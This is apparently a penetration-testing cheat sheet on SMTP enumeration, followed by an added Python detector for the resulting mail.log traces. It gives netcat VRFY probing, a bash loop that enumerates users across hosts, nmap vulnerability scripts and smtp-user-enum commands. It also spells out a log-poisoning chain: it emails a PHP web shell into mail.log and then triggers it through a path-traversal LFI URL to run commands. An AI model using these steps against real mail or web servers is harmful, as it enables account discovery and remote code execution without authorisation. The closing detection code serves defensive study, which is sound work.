Hack$Notes

SMTP Enum

CheckList

  • Check for version

  • Log file poisoning chained with an LFI

  • User enumeration

Grab the banner and VRFY

nc -nv 10.11.12.8 25
VRFY bob
250 2.1.5 bob@redhat.active.com          <--- Output if user exists

VRFY idontexist
550 5.1.1 idontexist... User unknown     <--- Output if user does not exist

EXPN request: asks the server for the membership of a mailing list

Bash Script for SMTP

#!/bin/bash

# VRFY Script
#############
# numbers.txt: last octets of the hosts to check (10.11.1.<n>)
# users.txt:   usernames to verify
# Only "250" replies (user exists) are printed. Hosts that answer 252 to every
# VRFY give no information and will print nothing.

while read -r ips; do                           # numbers.txt list of IP's
	while read -r user; do                      # users.txt list of usernames
		echo "VRFY $user" | nc -nv -w 1 "10.11.1.$ips" 25 2>/dev/null | grep '^250'
	done < users.txt
done < numbers.txt

SMTP nmap scripts

nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1

SMTP user enum

smtp-user-enum -M VRFY -D domain.here -u username -t 10.10.10.10
smtp-user-enum -M VRFY -U usernamelist.txt -t 10.10.10.10

Code Execution through SMTP/LFI

telnet 10.10.10.10 25
EHLO sub.somedomain.com
VRFY username@localhost
mail from:someself@nodomain.io
rcpt to: username@localhost
data
Subject: Some Subject
<?php echo system($_REQUEST['cmd']); ?>

.

=================================================
After this, on the LFI you have discovered, pass the cmd parameter (alone or appended to the existing query string):
?cmd=id
&cmd=id

Examples:
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=whoami
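Seen from the mail server, both the VRFY loop above and the log-poisoning message leave traces in mail.log. The following Python example is added here and is not part of the original notes: it parses a constructed, simplified mail.log excerpt (the line layout, the `smtpd` process name and the five-probe threshold are assumptions) and returns the sources that burst VRFY/EXPN probes and the entries that carry a PHP open tag.

```python
import re
from collections import defaultdict

# Constructed sample mail.log excerpt (not from the notes or any real server); the
# "source_ip: VERB arg -> reply" layout is a simplification so the parser runs offline.
SAMPLE_LOG = """\
Mar 10 12:00:01 mx smtpd[4242]: 10.11.1.50: VRFY bob -> 250 2.1.5 bob@redhat.active.com
Mar 10 12:00:02 mx smtpd[4242]: 10.11.1.50: VRFY alice -> 550 5.1.1 alice... User unknown
Mar 10 12:00:02 mx smtpd[4242]: 10.11.1.50: VRFY root -> 250 2.1.5 root@redhat.active.com
Mar 10 12:00:03 mx smtpd[4242]: 10.11.1.50: VRFY admin -> 550 5.1.1 admin... User unknown
Mar 10 12:00:03 mx smtpd[4242]: 10.11.1.50: EXPN staff -> 550 5.1.1 staff... User unknown
Mar 10 12:00:04 mx smtpd[4242]: 10.11.1.50: VRFY test -> 550 5.1.1 test... User unknown
Mar 10 12:05:01 mx smtpd[4243]: 10.11.1.7: VRFY carol -> 250 2.1.5 carol@redhat.active.com
Mar 10 12:06:00 mx smtpd[4244]: 10.11.1.99: MAIL FROM:<someself@nodomain.io> -> 250 2.1.0 Ok
Mar 10 12:06:01 mx smtpd[4244]: 10.11.1.99: SUBJECT <?php echo system($_REQUEST['cmd']); ?> -> 250 2.0.0 Ok
"""

LINE_RE = re.compile(
    r"smtpd\[\d+\]: (?P<ip>[\d.]+): (?P<verb>VRFY|EXPN|MAIL FROM|RCPT TO|SUBJECT)[ :]\s*"
    r"(?P<arg>.*?) -> (?P<code>\d{3}) (?P<rest>.*)$"
)
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)

def parse_line(line):
    """Return the fields of a recognised smtpd line, or None for anything else."""
    m = LINE_RE.search(line)
    return m.groupdict() if m else None

def enumeration_sources(log_text, min_probes=5):
    """Map source IP -> (VRFY/EXPN probes, 5.1.1 'User unknown' rejections) for sources
    that sent at least min_probes probes: the server-side trace of the VRFY loop above."""
    probes = defaultdict(lambda: [0, 0])
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["verb"] in ("VRFY", "EXPN"):
            probes[rec["ip"]][0] += 1
            if rec["code"].startswith("5") and rec["rest"].startswith("5.1.1"):
                probes[rec["ip"]][1] += 1
    return {ip: tuple(c) for ip, c in probes.items() if c[0] >= min_probes}

def poisoned_entries(log_text):
    """Return (ip, verb, arg) for entries whose logged argument carries a PHP open
    tag: the marker to alert on when mail.log is reachable through an LFI."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and PHP_TAG_RE.search(rec["arg"]):
            hits.append((rec["ip"], rec["verb"], rec["arg"]))
    return hits
```

With the sample above, `enumeration_sources` reports 10.11.1.50 with 6 probes and 4 rejections, and `poisoned_entries` flags the SUBJECT line from 10.11.1.99.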

Last updated 3 years ago
